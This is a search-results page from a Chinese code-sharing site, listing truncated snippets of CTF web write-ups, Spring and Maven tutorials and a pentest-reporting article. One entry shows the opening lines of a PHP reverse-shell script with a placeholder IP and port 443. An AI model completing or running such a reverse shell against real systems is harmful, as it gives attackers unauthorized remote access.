码迷,mamicode.com
首页 >  
搜索关键字:reporting    ( 607个结果
php_bugs学习 02 绕过过滤的空白字符
<?php $info = ""; $req = []; $flag="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; ini_set("display_error", false); //为一个配置选项设置值 error_reporting(0); //关闭所有PHP错 ...
分类:Web程序   时间:2021-07-05 19:06:03    阅读次数:0
PHP反弹脚本 Linux/Windows两用
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
分类:Windows程序   时间:2021-07-05 19:00:38    阅读次数:0
[RoarCTF 2019]Easy Calc
点开题目,发现只是一个计算框 查看一下源代码 发现了一串代码 .ajax是指通过http请求加载远程数据 输入的算式会被传进calc.php文件中 且提示网页存在waf(就是防火墙) 访问cala.php试试 有一串php代码 1 <?php 2 error_reporting(0); 3 if(! ...
分类:其他好文   时间:2021-06-13 09:27:14    阅读次数:0
CTF web之旅 45
提示备份文件 直接url/www.zip得到源代码 分别得到以下关键代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesy ...
分类:Web程序   时间:2021-06-08 22:34:20    阅读次数:0
maven的继承
前言 springcloud讲究的是模块化,直观上的做法就是使用maven来模块化每个包,例如原先实体类,接口,接口实现,控制器,都在同一个模块不同包中。而在cloud结构里边,则会分别提出来做成模块(为什么要搞这些华丽呼哨的?),提出来后,父工程的pom文件会修改成pom类型,并且作为父工程,引入 ...
分类:其他好文   时间:2021-06-02 19:27:18    阅读次数:0
JasperReports with Spring
1. Overview JasperReports is an open source reporting library that enables users to create pixel-perfect reports that can be printed or exported in ma ...
分类:编程语言   时间:2021-04-21 11:48:33    阅读次数:0
iscc寻找小明3
题目地址 http://101.201.126.95:7012/ 访问 key.php 跳转 F12查看源码 <?php <head> <title>ISCC | 寻找小明</title> <style> <p>他究竟在哪呢... </div>。。。 <!-- error_reporting(0); ...
分类:其他好文   时间:2021-04-05 12:17:05    阅读次数:0
Spring Cloud Config:外部集中化配置管理
Spring Cloud Config:外部集中化配置管理 摘要 Spring Cloud Config 可以为微服务架构中的应用提供集中化的外部配置支持,它分为服务端和客户端两个部分 。 Spring Cloud Config 简介 Spring Cloud Config 分为服务端和客户端两个部 ...
分类:编程语言   时间:2021-02-16 12:08:08    阅读次数:0
CTF web每日一题
error_reporting(0);// 关闭错误报告 session_start();//启动会话 require('./flag.php'); if(!isset($_SESSION['nums'])){//isset() — 检测nums变量是否设置。 $_SESSION['nums'] = ...
分类:Web程序   时间:2021-02-01 11:42:42    阅读次数:0
Penetration Test - Reporting_and_Communication(1)
Writing Reports PEN TEST REPORT Communicate findings AND recommendations Primary recommendations Only change to make your points Digest of all activit ...
分类:Web程序   时间:2020-12-21 11:11:34    阅读次数:0
607条   1 2 3 4 ... 61 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!